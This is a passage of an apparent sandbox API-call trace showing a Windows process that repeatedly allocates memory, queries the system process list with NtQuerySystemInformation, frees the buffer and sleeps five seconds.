returned 0x0 [0231.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.047] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.065] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.083] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 